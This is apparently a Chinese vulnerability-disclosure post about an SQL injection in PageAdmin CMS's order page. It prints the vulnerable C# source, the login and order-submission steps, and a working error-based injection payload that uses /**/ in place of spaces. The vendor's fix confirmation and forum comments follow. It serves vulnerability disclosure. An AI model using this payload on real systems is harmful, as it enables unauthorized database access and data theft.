2014-06-28: 细节已通知厂商并且等待厂商处理中 2014-06-28: 厂商已经确认,细节仅向厂商公开 2014-07-01: 细节向第三方安全合作伙伴开放 2014-08-22: 细节向核心白帽子及相关领域专家公开 2014-09-01: 细节向普通白帽子公开 2014-09-11: 细节向实习白帽子公开 2014-09-26: 细节向公众公开
http://www.pageadmin.net/soft/这里下载 最新版进行测试最新版存在注入
地址
http://192.168.1.108/e/order/order1.aspx?s=1&table=product&id=28
文件
order1.aspx
主要源码如下
using System;using System.Web;using System.Web.UI;using System.Web.UI.WebControls;using System.Web.UI.HtmlControls;using System.Data;using System.Data.OleDb;using System.Configuration;namespace PageAdmin { public class order1:Page { protected Repeater List,S_List; OleDbConnection conn; string UserName,Str_orderid,SendWay,sql; protected string SiteId,Table,Tongji,Tongji_Point; protected int RecordCounts; int SendSpending; protected void Page_Load(Object sender,EventArgs e) { SiteId=Request.QueryString["s"]; Table=Request.QueryString["table"]; if(!Page.IsPostBack) { Conn Myconn=new Conn(); conn=new OleDbConnection(Myconn.Constr()); Member_Check(); if(Request.Form["post"]=="add") { conn.Open(); if(IsNum(SiteId)) { Order_Add(); //跟进 } conn.Close(); } else { if(IsNum(SiteId)) { conn.Open(); Get_Total(); Data_Bind(); conn.Close(); } } } }//看这个函数private void Order_Add() { string Name=Request.Form["name"]; string Tel=Request.Form["tel"]; string Province=Request.Form["Province"]; string City=Request.Form["city"]; string Email=Request.Form["email"]; string PostCode=Request.Form["postcode"]; string Address=Request.Form["address"]; string Beizhu=ubb(Request.Form["beizhu"]); //我们直接看这里吧ubb函数只是对空格进行转换 所以空格等下我们用/**/就不会被转义了 SendWay="待确定"; SendSpending=0; if(IsNum(Request.Form["sendway"])) { int SendWayId=int.Parse(Request.Form["sendway"]); Get_SendWay(SendWayId); } //生成订单号 Random r=new Random(); Str_orderid=System.DateTime.Now.ToString("yyMMddHHmmss")+r.Next(0,100);//下面存在注入 sql="insert into pa_orders(site_id,username,order_id,name,tel,province,city,email,postcode,address,beizhu,sendway,send_spending,operator) values("+SiteId+",'"+UserName+"','"+Str_orderid+"','"+Name+"','"+Tel+"','"+Province+"','"+City+"','"+Email+"','"+PostCode+"','"+Address+"','"+Beizhu+"','"+SendWay+"',"+SendSpending+",'')"; //这里存在注入了 OleDbCommand comm=new OleDbCommand(sql,conn); comm.ExecuteNonQuery(); sql="update pa_orderlist set state=1,order_id='"+Str_orderid+"' where state=0 and username='"+UserName+"'"; comm=new OleDbCommand(sql,conn); comm.ExecuteNonQuery(); SendMail(Email); string Mem_Order_Ulr="/e/member/index.aspx?s="+SiteId+"&type=mem_odidx"; conn.Close(); Response.Write("<script type='text/javascript' src='/e/js/order.js'></script><script type='text/javascript'>order_submit('"+Mem_Order_Ulr+"');</script>"); Response.End(); }protected string ubb(string str) { if(string.IsNullOrEmpty(str)){return "";} str=str.Replace("\r\n","<br>"); str=str.Replace(" "," "); return str; } } }
对于insert型的注入 access版无法注入,SQL SERVER才行而且需要普通会员权限 普通会员可以注册这就无所谓了
本地进行测试先访问
http://192.168.1.108/e/member/index.aspx?type=login&s=1
登录 或者先注册 然后登录接着访问
接着输入信息报错注入其他说明处输入
1','a',22,'');select/**/*/**/from/**/pa_member/**/where/**/@@version>0--
把空格换成/**/
点提交订单 可以发现报错信息了
对提交的参数进行处理
危害等级:中
漏洞Rank:10
确认时间:2014-06-28 15:21
谢谢,我司将尽快发布升级包
2014-10-17:新版本已经修复此漏洞,感谢白帽子
@疯狗 @xsser 小产商? 不是吧
@what_news 嗯 是小漏洞
@xsser ok 我在努力上头条
@what_news 要求很严格哦
@xsser 看的出来 WooYun: PageAdmin CMS最新版SQL注入 从这个大产商 现在小产商就可以看出来了哈哈
@xsser @what_news 存在弊端啊,呵呵为什么不直接写个通告呢?前几页厂商、什么类型或者多大影响是分界线
( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)